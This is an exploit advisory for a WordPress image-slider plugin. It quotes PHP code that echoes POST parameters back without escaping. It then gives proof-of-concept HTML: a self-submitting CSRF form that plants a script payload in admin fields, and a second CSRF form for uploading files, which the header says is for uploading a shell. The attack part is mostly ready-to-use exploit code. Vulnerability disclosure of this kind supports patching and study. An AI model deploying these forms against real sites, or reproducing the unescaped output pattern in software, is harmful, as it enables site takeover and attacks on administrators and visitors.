###################### # Exploit Title : Wordpress Vertical image slider CSRF/XSS # Exploit Author: Ashiyane Digital Security Team # Vendor Homepage: https://wordpress.org/plugins/wp-vertical-image-slider/ # Software Link: https://downloads.wordpress.org/plugin/wp-vertical-image-slider.zip # Date: 2015-08-2 # Version: 1.0 # Tested On : Elementary OS - Firefox ###################### # Vulnerabilities : - Cross Site Request Forgery (For change the values and upload shell) - Cross Site Scripting ###################### # Vulnerable Code: <?php $title=trim(addslashes($_POST['imagetitle'])); $imageurl=trim($_POST['imageurl']); ?> ... <input type="text" id="imageurl" class="url" tabindex="1" size="30" name="imageurl" value="<?php echo $image_link; ?>"> <input type="text" id="imagetitle" tabindex="1" size="30" name="imagetitle" value="<?php echo $title;?>"> # it shows the content of imagetitle and imageurl parameter without any filters. ###################### # Exploit (CSRF, XSS): --> <form method="post" name="form1" action="http://[URL]/[PATH]/wp-admin/admin.php?page=vertical_thumbnail_slider_image_management&action=addedit" enctype="multipart/form-data"> <input type="hidden" name="imagetitle" value='"><script>alert("XSS")</script>'> <input type="hidden" name="imageurl" value='"><script>alert("XSS")</script>'> <input type="file" name="image_name" /> <input type="submit" name="btnsave" value="Save Changes"> </form> <script type="text/javascript"> setTimeout('form1.submit()', 1); </script> <!-- ###################### # Just for upload something by CSRF: --> <form method="post" action="http://[URL]/[PATH]/wp-admin/admin.php?page=vertical_thumbnail_slider_image_management&action=addedit" enctype="multipart/form-data"> <input type="file" name="image_name" /> <input type="submit" name="btnsave" value="Save Changes"> </form> <!-- ###################### # Discovered By : Ehsan Hosseini ###################### -->